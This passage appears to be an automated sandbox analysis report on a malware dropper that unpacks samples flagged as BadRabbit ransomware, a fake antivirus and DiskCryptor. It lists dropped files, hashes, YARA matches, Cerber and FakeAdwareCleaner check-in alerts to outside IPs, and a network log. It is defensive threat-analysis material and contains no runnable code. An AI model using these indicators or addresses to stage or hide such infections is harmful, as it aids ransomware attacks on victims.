                                                                                                                                                    SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                                                                                                                                    SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):609584
                                                                                                                                                    Entropy (8bit):6.089159959275534
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:LUVJnkkCKDCUUgdxxnwH8aYvR4+NyEFVUmJ8ts:QvknYJ4xEFCmuu
                                                                                                                                                    MD5:821511549E2AAF29889C7B812674D59B
                                                                                                                                                    SHA1:3B2FD80F634A3D62277E0508BEDCA9AAE0C5A0D6
                                                                                                                                                    SHA-256:F59CDF89F0F522CE3662E09FA847BCA9B277B006C415DCC0029B416C347DB9C4
                                                                                                                                                    SHA-512:8B2E805B916E5FBFCCCB0F4189372AEA006789B3847B51018075187135E9B5DB9098F704C1932623F356DB0EE327E1539A9BF3729947E92844A26DB46555E8CD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......4....N&.....#.....2...........=.......@....+ .........................`.......................................*.......+..:....p...............9.. .......p_...+..................................................d............................text....0.......2.................. ..`.data...8....P.......8..............@....rsrc........p.......V..............@....reloc..p_.......`..................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8192
                                                                                                                                                    Entropy (8bit):2.7347658547462936
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:Q1Nr522G8b7kURb7kEnb7klj1b7k/nb7kbIl9lWGnb7k0tpl1b7kf9b7kqcb7kwo:A2230UR0g0H0f0U9b0Cl10V050709O
                                                                                                                                                    MD5:BA0141344FA7FCD9C3824694726AF0B0
                                                                                                                                                    SHA1:1BB43688520EB7F7A4C5966E966EF382DAAD4396
                                                                                                                                                    SHA-256:2F31C26359F70E9BC1A31BFC3189FD2E99536FAC8D74069AE9BB1B8F911C0C02
                                                                                                                                                    SHA-512:DF4A317907FE19AF727F8C30EB059790CE0EB4D1E58F2E6A87969EB361B845680C4E8FC3259CD14AA130BC5C971A813512498CF0A703BEAB1260C04293D99AC3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:....................................................!....................................S.......................B......-...N...Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... .....K..N...........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.9.2.9._.2.1.5.9.0.3._.1.3.5...e.t.l.............P.P..........S..................................................................9.B..S......17134.1.amd64fre.rs4_release.180410-1804............5.@..S......OYo."(.s..O........WaaSMedicSvc.pdb............................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1066176
                                                                                                                                                    Entropy (8bit):6.377536905123536
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:K2woQX9+gWX6b+SHQjxnRC33Oej3zR/QhF7OnVz3S7HM7BHg:5kX9+V6KTpcPhkgVSglg
                                                                                                                                                    MD5:714CF24FC19A20AE0DC701B48DED2CF6
                                                                                                                                                    SHA1:D904D2FA7639C38FFB6E69F1EF779CA1001B8C18
                                                                                                                                                    SHA-256:09F126E65D90026C3F659FF41B1287671B8CC1AA16240FC75DAE91079A6B9712
                                                                                                                                                    SHA-512:D375FD9B509E58C43355263753634368FA711F02A2235F31F7FA420D1FF77504D9A29BB70AE31C87671D50BD75D6B459379A1550907FBE5C37C60DA835C60BC1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."x$9.....@.....#.........l...... ........p....X'.........................P.......................................@...............P...Z.........../...............................................................................................text............................... ..`.data....s.......r..................@....rsrc...4\...P...^...6..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):10874
                                                                                                                                                    Entropy (8bit):3.1642897517185156
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+6I3+zJ4n+hA:j+s+v+b+P+m+0+Q+q+q+73+zq+C
                                                                                                                                                    MD5:9EAC3331794721EB4A20BB62BD68FC42
                                                                                                                                                    SHA1:834F2123785D43C9D8857CD92AADD4B35261F092
                                                                                                                                                    SHA-256:BFD8BDFC7F316848C440B6A407BF91F56FDB93CD2EC4C3B227B7F77A77B2E531
                                                                                                                                                    SHA-512:6BB9D76CEE78AAD96D5F6485EE0EDE74D5F240070FF7F444A48E5E6B788BC1580E3291AFA6EAD9313AB60F97EE69C7822CEA329A35C6F53E515853FE1BDBFBDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9728
                                                                                                                                                    Entropy (8bit):6.687856479733953
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:bypFwq/1Z6LKAVkPTDtlkZkH7KtkbT/zRAtO7/G97+vHiu9:bryfAVkvtSZkWaAtpxA9
                                                                                                                                                    MD5:CD1800322CCFC425014A8394B01A4B3D
                                                                                                                                                    SHA1:171073975EFFDE1C712DFD86309457FD457AED33
                                                                                                                                                    SHA-256:8115DE4AD0B7E589852F521EB4260C127F8AFEAA3B0021BFC98E4928A4929AC0
                                                                                                                                                    SHA-512:92C22C025FD3A61979FA718BF2E89A86E51BF7E69C421A9534FBF9C2D5B23B7A9224D0E9F3E0501992038837015214D1EF73B532A68B7D19DE559C9AB9C6E5F6
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...6...*...5...*..t5...*..Rich.*..................PE..L...].;K................. ..........0.............@.........................................................................L...........L...........................................................................................................UPX0....................................UPX1..... ..........................@....rsrc................ ..............@..............................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):210632
                                                                                                                                                    Entropy (8bit):6.677691827536191
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                                                                                                                                    MD5:EDB72F4A46C39452D1A5414F7D26454A
                                                                                                                                                    SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                                                                                                                                    SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                                                                                                                                    SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):142848
                                                                                                                                                    Entropy (8bit):6.314365095327337
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                                                                                                    MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                                                                    SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                                                                                                    SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                                                                                                    SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@BadRabbit.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):410760
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3::
                                                                                                                                                    MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                                                                                                    SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                                                                                                    SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                                                                                                    SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7
                                                                                                                                                    Entropy (8bit):2.2359263506290326
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:t:t
                                                                                                                                                    MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                                                                    SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                                                                    SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                                                                    SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:Ok.....
                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Entropy (8bit):7.930024861123216
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                    File name:07bb0738.exe
                                                                                                                                                    File size:153088
                                                                                                                                                    MD5:e8583ee36603531bcf5001346c7474a7
                                                                                                                                                    SHA1:4a740bc0de76cf7597d001f5cb659b220de6dccd
                                                                                                                                                    SHA256:792b258b63cc60abacdcc9218b04152805081b3cf8d11de875969c7f07bb0738
                                                                                                                                                    SHA512:fb813d434cea07aea28bf52834a125a8bd46ae7f34034a96793785c1d8cda3adc3c811af98dc6a1337a1bc6b73397d177c29d1c9ff282f29415b616b236c7e13
                                                                                                                                                    SSDEEP:3072:p+OvuAoccS2sTQMMBXZ+YSuwydCcGmDceCd4aMc9KDouBIOQ:p+OvujS2sTFOXZ+YKmADd4alwJN
                                                                                                                                                    TLSH:96E31288AE9DBA63C8DE57FCC0E98D14435C92261A12FB4FE6A46CD40D4AFD305467B3
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..`.........."......L...........i... ........@.. ....................................`................................
                                                                                                                                                    Icon Hash:00828e8e8686b000
                                                                                                                                                    Entrypoint:0x4269fe
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:false
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x601F1161 [Sat Feb 6 22:00:01 2021 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                    Instruction
                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x269a80x53.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x566.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x20000x24a040x24c00False0.9701583758503401data7.959499048197106IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rsrc0x280000x5660x600False0.408203125data3.9657132211361437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .reloc0x2a0000xc0x200False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                    RT_VERSION0x280a00x2dcdata
                                                                                                                                                    RT_MANIFEST0x2837c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                    DLLImport
                                                                                                                                                    mscoree.dll_CorExeMain
                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    192.168.2.393.107.12.45563968932023619 09/29/22-15:00:07.760760UDP2023619ET TROJAN Ransomware/Cerber Checkin M3 (8)556396893192.168.2.393.107.12.4
                                                                                                                                                    192.168.2.3185.53.177.5349829802809804 09/29/22-15:00:22.831778TCP2809804ETPRO MALWARE FakeAdwareCleaner.A Checkin4982980192.168.2.3185.53.177.53
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Sep 29, 2022 14:58:38.386570930 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.386626959 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.386755943 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.387032986 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.387044907 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.454329014 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.454751968 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.455262899 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.455274105 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.456746101 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.456758976 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.456914902 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.456933022 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.457617044 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.457642078 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.462831974 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.462867022 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.466697931 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.466711044 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.605679989 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.605767965 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.605948925 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.606100082 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.606117010 CEST44349707204.79.197.200192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:38.606132030 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:38.608695984 CEST49707443192.168.2.3204.79.197.200
                                                                                                                                                    Sep 29, 2022 14:58:45.521949053 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.522015095 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.522103071 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.527302980 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.527354002 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.588493109 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.588583946 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.594896078 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.594938040 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.595308065 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.635272980 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.635334015 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.653002024 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.653078079 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.653153896 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.653342962 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.653381109 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.653400898 CEST49708443192.168.2.323.50.105.163
                                                                                                                                                    Sep 29, 2022 14:58:45.653412104 CEST4434970823.50.105.163192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:58:45.709024906 CEST49709443192.168.2.323.50.105.163
